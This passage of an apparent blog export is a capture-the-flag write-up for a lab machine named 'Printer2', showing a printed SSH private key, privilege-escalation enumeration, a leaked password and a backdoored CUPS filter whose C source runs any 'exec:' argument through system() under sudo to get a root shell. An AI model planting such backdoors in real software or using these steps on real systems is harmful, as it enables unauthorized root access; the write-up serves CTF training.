e4g6hAyJwpPDRpSGNjdlLlAQRRYgkXV0FQl1lFhCRKGRT\/5i7zkav3ttuy0\nbmTNnCHPGglqhUPNMyn7\/NsCrumeuPA93nff+QeRRbwqjjlcHe9NlI0M2zgTLtcr5017sg\n7mfpRwEowuxS40jn75sdovPlBDjd9nXggjF5njEtJH3002\/Y7ktvXj0zut8IYzDeuaToOD\n+7pdjrdwwjnSw+YESyDmGYYiU48vmj8NYmkmO5CR7yN54fa+fWMj+UE2gOaVXXKLSUj9Nv\nvgSdihcknccB8QSlpbV9P2fowgL2F66CQmMBpcijjGsqYAnnTlLvDl4rr4mKALGpkBXRdk\nONcfBr4GCN9DCZhw4xK\/BNMTM8y89nQo1hEhdFST\/2m+JdiekeGEBjsYCS6NFMAWEBAAAA\nwFQXd68P2TJtMUBLclBpnCeoJ1KvFSrpo4WMXG2uuSBUiy1x7KzM42atvMf0\/OwJstW6C2\nkhWO9Q0CxeqMuSb4lQ5BhAz3kNNt+kJtgBdinw8M8\/1x\/FzA18xrvtq2haFOGw8cGF1U3u\nfpF+FCJl5+PxAITjKQVxa+rJlz9P2oQHcTI5PU0yQwfle53Dv9JBOVBPhPo1ITenOR6PIj\nPs7r4yUJI6jnnZ1rguOJFo\/ge
hUHrPmfVW4NfnYkWBQFafsAAAAMEA27rpSEIF2xYcmwNJ\nd31W0vbL05K1Zs2496hjo2xuDd0VTZBF+8+d2iZSUvhiXGw9MDFb0kaWEWGSqOA4UivtY9\neSrIzmU6fCkn3oxXiFvfexCn3iSxcbz0r2T9oGZ4CLuy\/raMmVwSa049Jzw6gtXbzWq\/dO\nsXIO1MIj9fuJ7kjriG9CYOYlXk6f2mIZvVmip6HNXdCwLySFitwQATTMY4m1jYV2IqRKKj\nuYWiQ9K4MZj60POU2EvZ8Tqhlt1hqVAAAAwQDN73kJIzeQlliK82rqUPtdTffS\/sIPl5mz\n1aJkeS8MI2sMvyLibNaZ2B8CuVrQ9Zsc1KGIw7M4DVljdI4Ua6l29MHPsbY4YHvPupVwBm\njHhCzZOmzzxOKmySh\/U2GUf1BHx4E\/9dkbyXRlF\/bAzopTbTcmc1ktP1UKw4bJwblqUOIA\nrR1UiEpKQFxbLzTOxCfRUHWKGBVJU1jfXU5QWtQX6DubkCw0vM6P2UmoLioutXr3ZkNU8K\ny3EhaUlRX0QpEAAAATbWFiZWxsZUBwcmludGVyLmhtdg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>Try switching user!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751135.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751135.png\" alt=\"image-20240428172351336\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Further Privilege Escalation<\/h3>\n<pre><code class=\"language-bash\">    3  sudo -l\n    4  ls -la\n    5  find \/ -perm -u=s -type f 2&gt;\/dev\/null\n    6  \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n    7  ss -atlp\n    8  nc 127.0.0.1 1001<\/code><\/pre>\n<p>Running the program overwrites the terminal, so give it a try:<\/p>\n<pre><code class=\"language-apl\">No need for brute force here!\nHackerman<\/code><\/pre>\n<pre><code 
class=\"language-apl\">I put a backdoor in a printer filter.\n\nFilter name: hack\nYou need to wait at least 60 seconds between attempts.<\/code><\/pre>\n<p>Further information gathering:<\/p>\n<pre><code class=\"language-bash\">mabelle@printer:~$ cd \/opt\nmabelle@printer:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root  4096 Apr 22  2023 .\ndrwxr-xr-x 18 root root  4096 Feb  6  2023 ..\ndrwxr-xr-x 26  501 staff 4096 Apr 16  2023 cups-2.3.3\nmabelle@printer:\/opt$ cd cups-2.3.3\/\nmabelle@printer:\/opt\/cups-2.3.3$ ls -la\n........\nmabelle@printer:\/opt\/cups-2.3.3$ cd filter\nmabelle@printer:\/opt\/cups-2.3.3\/filter$ ls -la\ntotal 1144\ndrwxr-xr-x  2  501 staff   4096 Apr 22  2023 .\ndrwxr-xr-x 26  501 staff   4096 Apr 16  2023 ..\n-rw-r--r--  1  501 staff  11541 Feb  6  2023 commandtops.c\n-rw-r--r--  1 root root   50488 Feb  6  2023 commandtops.o\n-rw-r--r--  1  501 staff  11613 Feb  6  2023 common.c\n-rw-r--r--  1  501 staff   1344 Feb  6  2023 common.h\n-rw-r--r--  1 root root   49312 Feb  6  2023 common.o\n-rw-r--r--  1  501 staff   2719 Feb  6  2023 Dependencies\n-rw-r--r--  1  501 staff   2038 Feb  6  2023 gziptoany.c\n-rw-r--r--  1 root root   17048 Feb  6  2023 gziptoany.o\n-rw-r--r--  1  501 staff   4053 Feb  6  2023 Makefile\n-rw-r--r--  1  501 staff   1295 Feb  6  2023 postscript-driver.header\n-rw-r--r--  1  501 staff  14701 Feb  6  2023 postscript-driver.shtml\n-rw-r--r--  1  501 staff   1275 Feb  6  2023 ppd-compiler.header\n-rw-r--r--  1  501 staff  36686 Feb  6  2023 ppd-compiler.shtml\n-rw-r--r--  1  501 staff  86511 Feb  6  2023 pstops.c\n-rw-r--r--  1 root root  233464 Feb  6  2023 pstops.o\n-rw-r--r--  1  501 staff   1232 Feb  6  2023 raster-driver.header\n-rw-r--r--  1  501 staff  11869 Feb  6  2023 raster-driver.shtml\n-rw-r--r--  1  501 staff  24526 Feb  6  2023 rastertoepson.c\n-rw-r--r--  1 root root  104192 Feb  6  2023 rastertoepson.o\n-rw-r--r--  1  501 staff  18977 Feb  6  2023 rastertohp.c\n-rw-r--r--  1 root 
root   94120 Feb  6  2023 rastertohp.o\n-rw-r--r--  1  501 staff  27170 Feb  6  2023 rastertolabel.c\n-rw-r--r--  1 root root  129552 Feb  6  2023 rastertolabel.o\n-rw-r--r--  1 root root   16862 Feb  6  2023 rastertopwg.c\n-rw-r--r--  1 root root   78152 Feb  6  2023 rastertopwg.o\n-rw-r--r--  1  501 staff   1346 Feb  6  2023 spec-ppd.header\n-rw-r--r--  1  501 staff  79306 Feb  6  2023 spec-ppd.shtml<\/code><\/pre>\n<p>In theory it is enough to try them all, but every attempt means a 60-second wait, so try them from last to first.<\/p>\n<pre><code class=\"language-bash\">mabelle@printer:\/opt\/cups-2.3.3\/filter$ ls *.c\ncommandtops.c  common.c  gziptoany.c  pstops.c  rastertoepson.c  rastertohp.c  rastertolabel.c  rastertopwg.c<\/code><\/pre>\n<pre><code class=\"language-bash\">I put a backdoor in a printer filter.\n\nFilter name: rastertopwg\n\nYou are awesome! Here is the password: wK4EyQ15Cga<\/code><\/pre>\n<p>Success, nailed it, hehe.<\/p>\n<p>Try switching users:<\/p>\n<pre><code class=\"language-bash\">mabelle@printer:\/opt\/cups-2.3.3\/filter$ su root\nPassword: \nsu: Authentication failure\nmabelle@printer:\/opt\/cups-2.3.3\/filter$ cat \/etc\/passwd | grep &quot;bash&quot;\nroot:x:0:0:root:\/root:\/bin\/bash\nmabelle:x:1000:1000:,,,:\/home\/mabelle:\/bin\/bash\nkierra:x:1001:1002:,,,:\/home\/kierra:\/bin\/bash\nmabelle@printer:\/opt\/cups-2.3.3\/filter$ su kierra\nPassword: \nkierra@printer:\/opt\/cups-2.3.3\/filter$ <\/code><\/pre>\n<h3>Even further privilege escalation<\/h3>\n<pre><code class=\"language-bash\">kierra@printer:\/opt\/cups-2.3.3\/filter$ sudo -l\n[sudo] password for kierra: \nMatching Defaults entries for kierra on printer:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser kierra 
may run the following commands on printer:\n    (ALL : ALL) \/usr\/lib\/cups\/filter\/rastertopwg<\/code><\/pre>\n<p>Look at the C source code for this filter and try running it:<\/p>\n<pre><code class=\"language-bash\">kierra@printer:\/opt\/cups-2.3.3\/filter$ ls -l \/usr\/lib\/cups\/filter\/rastertopwg\n-rwxr-xr-x 1 root root 18752 Mar 14  2022 \/usr\/lib\/cups\/filter\/rastertopwg\nkierra@printer:\/opt\/cups-2.3.3\/filter$ cat \/usr\/lib\/cups\/filter\/rastertopwg.c\ncat: \/usr\/lib\/cups\/filter\/rastertopwg.c: No such file or directory\nkierra@printer:\/opt\/cups-2.3.3\/filter$ ls -l *.c\n-rw-r--r-- 1  501 staff 11541 Feb  6  2023 commandtops.c\n-rw-r--r-- 1  501 staff 11613 Feb  6  2023 common.c\n-rw-r--r-- 1  501 staff  2038 Feb  6  2023 gziptoany.c\n-rw-r--r-- 1  501 staff 86511 Feb  6  2023 pstops.c\n-rw-r--r-- 1  501 staff 24526 Feb  6  2023 rastertoepson.c\n-rw-r--r-- 1  501 staff 18977 Feb  6  2023 rastertohp.c\n-rw-r--r-- 1  501 staff 27170 Feb  6  2023 rastertolabel.c\n-rw-r--r-- 1 root root  16862 Feb  6  2023 rastertopwg.c\nkierra@printer:\/opt\/cups-2.3.3\/filter$ cat rastertopwg.c<\/code><\/pre>\n<pre><code class=\"language-c\">\/*\n * &#039;main()&#039; - Main entry for filter.\n *\/\n\nint                                     \/* O - Exit status *\/\nmain(int  argc,                         \/* I - Number of command-line args *\/\n     char *argv[])                      \/* I - Command-line arguments *\/\n{\n  const char            *final_content_type;\n\n  for (int i = 1; i &lt; argc; i++) {\n    if (strncmp(argv[i], &quot;exec:&quot;, 5) == 0) {\n      system(argv[i] + 5);\n    }\n  }<\/code><\/pre>\n<pre><code class=\"language-bash\">kierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec: whoami\nUsage: 
rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg -exec whoami\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec whoami\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec:whoami\nroot\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec:bash\nroot@printer:\/opt\/cups-2.3.3\/filter# cd \/root\nroot@printer:~# ls -la\ntotal 28\ndrwx------  4 root root 4096 May 20  2023 .\ndrwxr-xr-x 18 root root 4096 Feb  6  2023 ..\nlrwxrwxrwx  1 root root    9 Apr 14  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  637 Apr 16  2023 .bashrc\ndrwx------  2 root root 4096 Apr 23  2023 .config\ndrwxr-xr-x  3 root root 4096 Apr 23  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rwx------  1 root root   33 Feb  6  2023 root_flag.txt<\/code><\/pre>\n<p>Got a root shell!!!!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Printer2 Information Scanning Port Scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2] \u2514\u2500$ 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-653","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/653","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=653"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/653\/revisions"}],"predecessor-version":[{"id":654,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/653\/revisions\/654"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=653"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=653"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=653"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}